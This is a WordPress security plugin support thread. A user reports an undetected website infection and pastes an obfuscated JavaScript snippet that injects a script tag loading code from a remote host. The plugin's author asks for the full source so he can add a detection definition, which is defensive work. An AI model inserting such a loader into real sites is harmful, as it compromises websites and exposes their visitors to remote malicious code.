Hello Eli! I want to thank you for the plugin, it has helped me clean dozens of websites that got infected last week. There is one in particular that GOTMLS hasn’t been able to completely secure, I think because it is not detecting it, though sucuri’s online site checker shows it. The specific code that sucuri shows is malware injection on several files, I think it might be hiding on widgets or something of the sort. Here I have a snippet
(_0x24b800 = _0x26d259['createElem' + 'ent'](‘script’))['type'] = ‘text/javas’ + ‘cript’, _0x24b800['async'] = !0×0, _0x24b800['src'] = ‘https://’ + _0x9cf45e + ‘/min.t.’ + _0xcb1eb8 + ‘.js?v=’ + _0x2196a7, _0x26d259['getElement' + 'sByTagName'](‘head’)[0x0]['appendChil' + 'd'](_0x24b800);
I don’t know when, or if you’ll get this, hopefully it will be sooner rather than later. Thanks again, this plugin is a life saver
I would like to add this definition right away, however I will need to see more than just a snippet of the code if I am to do anything meaningful with it. Can you please point me to the full source code in question?
I link to the infected page will do, if it is still showing the infected script, or else please send me the entire text from the source code of the page so that I can see how and where it is embeded and ensure that I can identify ALL of the malicious code and not leave behind any broken or partial code that might otherwise cause a syntax error on the site when only partially removed.
You can email me directly if you do not to devulge any personal information on this forum.
I sent an email from vdominguez AT capmega DOT com to eli AT gotmls DOT net, I hope it does reach your inbox. Thanks again
Thank you for posting this reply. I did not see your email until this post prompted me to check my spam folder. Now that I look at your website I can find no trace of this threat that you have asked about. Have you perhaps already found and removed it? Can you tell me where it was found and how you were able to remove it? Also, if you still have a backup of the infected content is there any way that you could share it with me so that I could still get this added to my definition updates?